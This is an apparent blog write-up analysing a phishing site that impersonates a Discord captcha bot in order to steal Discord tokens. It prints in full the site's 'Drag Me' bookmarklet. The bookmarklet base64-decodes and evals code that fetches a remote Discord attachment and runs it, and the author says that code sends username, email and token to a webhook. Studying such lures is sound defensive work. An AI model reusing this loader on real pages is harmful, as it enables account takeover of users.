Someone sent me a tweet to inquire if what was said in the tweet is true and not another click bait tweet. After looking at the tweet and doing some OSINT we found that there is a malicious actor using a fake bot impersonating a real Discord bot.

The first screenshot is of the fake Discord bot page attempting to steal Discord Token, the second screenshot is the real Discord page for the Discord Bot. The fake site is located at https://captcha-bot.io.

After reading what the fake site asks you to do it’s pretty obvious that it runs JS code through a bookmark. Let’s see what the bookmark really does by inspecting the element of “Drag Me”.

1

<a class="ml-4 m-4 bg-discord px-10 py-6 rounded-lg shadow-lg text-white text-center leading-7 text-2xl font-bold col-span-1" href="javascript:if (window.location.hostname != 'discord.com') { alert('Drag the verify button to your bookmarks &amp; go on https://discord.com to access the rest of the Discord server!') } else { eval(/*xmarksthespot.*/atob(/*Verification.*/'ZmV0Y2goImh0dHBzOi8vY2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRzLzkzNDI4MDc0NTIyNzI1NTgwOS85NjExMzM0MzEyNTU4Nzk3MDAvbWVzc2FnZS50eHQiKS50aGVuKHJlc3BvbnNlID0+IHJlc3BvbnNlLnRleHQoKSkudGhlbihzdWNjZXNzID0+IGV2YWwoc3VjY2Vzcykp')) }">Drag Me</a>

It seems to eval some decoded base64 string, let’s decode the base64 string to see what it does.

Well it fetches a Discord attachments and eval the code it gets from the URI. Of course it is obfuscated and needs to deobfuscated. It appears to grab Username, Discord ID, Email, Token and forwards it to a Discord webhook. Since this post the webhook has been deleted and has been neutralized.